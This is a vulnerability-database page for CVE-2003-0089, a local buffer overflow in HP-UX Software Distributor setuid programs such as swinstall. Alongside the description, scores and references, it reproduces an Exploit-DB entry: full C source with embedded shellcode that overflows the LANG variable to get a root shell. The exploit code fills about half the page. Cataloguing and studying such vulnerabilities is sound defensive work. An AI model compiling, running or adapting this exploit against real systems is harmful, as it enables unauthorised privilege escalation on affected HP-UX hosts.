CVE-2003-0089 : Detail

CVE-2003-0089

0.04%V3
Local
2003-11-18
04h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the Software Distributor utilities for HP-UX B.11.00 and B.11.11 allows local users to execute arbitrary code via a long LANG environment variable to setuid programs such as (1) swinstall and (2) swmodify.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23343

Publication date : 2002-12-10 23h00 +00:00
Author : watercloud
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/8986/info HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M). /* Program : x_hpux_11i_sw.c Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell. Complie : cc x_hpux_11i_sw.c -o x_sw ;./x_sw ( not use gcc for some system) Usage : ./x_sw [ off ] Tested : HP-UX B11.11 & HP-UX B11.0 Author : watercloud [@] xfocus.org Date : 2002-12-11 Note : Use as your own risk !! */ #include<stdio.h> #define T_LEN 2124 #define BUFF_LEN 1688 #define NOP 0x0b390280 char shellcode[]= "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08" "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16" "/bin/shA"; long addr; char buffer_env[2496]; char buffer[T_LEN]; void main(argc,argv) int argc; char ** argv; { int addr_off = 8208 ; long addr_e = 0; int n=BUFF_LEN/4,i=0; long * ap = (long *) &buffer[BUFF_LEN]; char * sp = &buffer[BUFF_LEN-strlen(shellcode)]; long * np = (long *) buffer; if(argc >0) addr_off += atoi(argv[1]); addr = ( (long) &addr_off +addr_off) /4 * 4 +4; for(i=0;i<n;np[i++]=NOP); memcpy(sp,shellcode,strlen(shellcode)); for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr); buffer[T_LEN -2 ] += 1; buffer[T_LEN - 1 ] = '\0'; sprintf(buffer_env,"LANG=AAA%s",buffer); putenv(buffer_env); execl("/usr/sbin/swinstall","swinstall","/tmp/null",NULL); /* if false ,test swverify. */ execl("/usr/sbin/swverify","swverify",NULL); }

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.11

References

http://www.securityfocus.com/bid/8986
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=106873965001431&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/advisories/6030
Tags : vendor-advisory, x_refsource_HP